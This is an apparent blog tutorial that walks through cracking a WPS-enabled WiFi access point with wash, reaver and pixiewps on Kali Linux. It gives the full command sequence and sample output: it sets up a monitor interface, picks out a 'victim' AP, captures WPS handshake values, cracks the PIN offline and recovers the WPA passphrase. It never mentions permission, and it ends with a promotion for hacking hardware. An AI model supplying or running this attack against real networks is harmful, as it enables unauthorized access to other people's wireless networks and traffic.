WiFi Hacking Software: PixieWPS & Reaver in Action
It’s a fast attack. For our sample we are using KALI Linux 2.0. And the already installed WiFi Hacking Tools pixiewps and reaver. We also disclose the full PSK (Password) from the attacked AP. That’s quite nifty!
Reaver: Brute Force Attack on WPS
You probably already know it: With the use of Reaver you can break (non-protected) WPS AP’s easily. But… It takes it’s time: between 2 and 10 hours. It all depends on the PIN Code which is used on the AP. Reaver endlessly challenges the WPS AP – PIN by PIN. We will go deeper into detail on another article dedicated on Reaver.
Now we use Reaver for a quite simple job: We catch the PKE, E-Hash1, E-Hash2 und AuthKey from our Victim AP. This way is tricky, since we can avoid the lockout mechanismen of some AP’s. But at first, let’s locate a victim. We are using Wash for that.
Wash: Finding WPS enabled AP’s
Before we start with Wash, we need to create a “mon” (Monitor) interface on KALI Linux. It’s done easily. Our WLAN Interface is “wlan2”. Adjust all values to your own WLAN-Interface. You can find that out by running
In our case we detect
as WiFi interface.
Next we start the WiFi monitoring interface by running
airmon-ng wlan2 start
which creates finally the monitoring interface “wlan2mon”. Verify it’s existing by running again
Now we are running wash:
wash -i wlan2mon
In our case we found an AP named “TargetWLAN” with the MAC-Address “BC:14:01:7E:C3:68”. Adjust the MAC-Adress to your Target’s MAC.
Reaver attacks the AP once
Now we run a very simple single attack with Reaver:
reaver -i wlan2mon -b BC:14:01:7E:C3:68 -vv -S
After you get one sequence of PKE, E-Hash1, E-Hash2 and AuthKey, hit CTRL-C. Looks like this when i did:
(Click to Zoom and checkout the sample)
Now we got:
We are ready to attack these combination – with PixieWPS.
PixieWPS – Offline WiFi Attack vs WPS Access Point
Lets combine the values of PKE, E-Hash1, E-Hash2 and AuthKey into PixieWPS. I don’t use the real values for this code snippet, since it would burst the screen!
pixiewps -e PKE_VALUE -s E-HASH1_VALUE -z E-HASH2_VALUE -a AUTHKEY_VALUE -S
The result will immediately:
Pixiewps 1.1 [*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 [*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 [+] WPS pin: 83075605 [*] Time taken: 0 s
We cracked the WPS Pin. It’s “83075605”. Let’s go for more. Now we use Reaver again and go for a one shot to get the PSK (Cleartext Password) for that WiFi!
If it says that WPS Pin not found: That Router is NOT VULNERABLE to PixieWPS!
Reaver One-Shot PSK from WPS Access Point
Since we got the Pin, we can use reaver as sniper rifle. One shot is enough. We add the parameter “-p” with the valid Pin Code. Looks like this:
reaver -i wlan2mon -b BC:14:01:7E:C3:68 -vv -p 83075605
(Replace the Pin Code “83075605” with the Pin Code you just cracked!)
And done. We got the PSK from our Target Access Point!
[+] WPS PIN: '83075605' [+] WPA PSK: 'XXXXXXXXXX' [+] AP SSID: 'TargetWLAN'
(WPA PSK removed)
Use that PSK to connect to the AP. You have been successful and hacked a WPS protected AP in less then one minute!
Urgent: For hacking AP’s most efficient, you need the right equipment. Check out our Hardware Page for the very best WiFi Hacking Adapters and Devices: